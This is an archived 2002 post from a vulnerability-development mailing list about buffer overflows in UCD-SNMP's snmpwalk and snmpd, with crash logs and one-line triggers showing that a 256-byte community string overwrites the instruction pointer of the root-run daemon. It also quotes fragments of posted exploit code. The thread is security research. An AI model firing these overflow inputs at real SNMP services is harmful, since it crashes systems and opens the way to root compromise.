Vulnerability Development mailing list archives

Re: snmpd exploit examination - snmpwalk

From: Syzop <syz () dds nl>
Date: Thu, 21 Feb 2002 22:59:19 +0100

Hi,

KF wrote:

I am not so sure about those proof of concept remote snmp exploits that were posted... they look more like
local exploits to me.

[root@linuxppc root]# ps -ef | grep snmp
root      6355     1 17 15:02 pts/1    00:00:59 /usr/sbin/snmpd -s -l /dev/null

(gdb) r  127.0.0.1 public `perl -e 'print "A" x 293'`
Starting program: /usr/bin/snmpwalk 127.0.0.1 public `perl -e 'print "A" x 293'`
Program received signal SIGSEGV, Segmentation fault.


I get the same results with: snmpwalk 127.0.0.1 public <long buffer>.
$ snmpwalk 127.0.0.1 public `perl -e 'print "A" x 3000'`
Segmentation fault
Feb 21 22:24:08 syzop kernel: pid 26942 (snmpwalk), uid 1001 exited on signal 11 reading or executing 0x41414141
However the exploit is doing: snmpwalk -p <port> <host> <long buffer>
[..]

These are the examples I have seen in various emails as methods to exploit snmpd...These seem to do
nothing on my box to the client or the daemon...

        snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 256'`
        execl("snmpwalk", "snmpwalk", "-p", port, host, buf, NULL);
        execl("/usr/local/bin/snmpwalk","snmpwalk",argv[1],"-c",buffer,NULL);


I tested this after the mail of H D Moore:
'The UCD-SNMP4.2.1 package is trivial to exploit. A community string of
exactly 256 bytes will smash eip.'
so:
$ snmpwalk 127.0.0.1 `perl -e 'print "A" x 256'`
(then, syslog reports:)
Feb 21 22:36:44 syzop kernel: pid 27154 (snmpd), uid 0 exited on signal 11 reading or executing 0x41414141
or at least here :)).
Tested at rh7.1 and debian 2.2 (both ia32).

Here are my results.


--snip--
Same results as here with your values.

It looks like it really has to be 256 chars here:
255 = nothing, 256 = EIP overwritten, 257 = nothing.

Give it too many chars and snmpwalk complains.
[root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 5000'`
snmpwalk: Error building ASN.1 representation


Same here after ~8200 chars.

Cya,

    Syzop.

PS: Resend since I forgot to include vuln-dev :P

Current thread:

snmpd exploit examination - snmpwalk KF (Feb 21)
- Re: snmpd exploit examination - snmpwalk Syzop (Feb 21)
- Message not available
  - Re: snmpd exploit examination - snmpwalk KF (Feb 21)
- Re: snmpd exploit examination - snmpwalk xbud (Feb 21)
- <Possible follow-ups>
- Re: snmpd exploit examination - snmpwalk The Itch (Feb 21)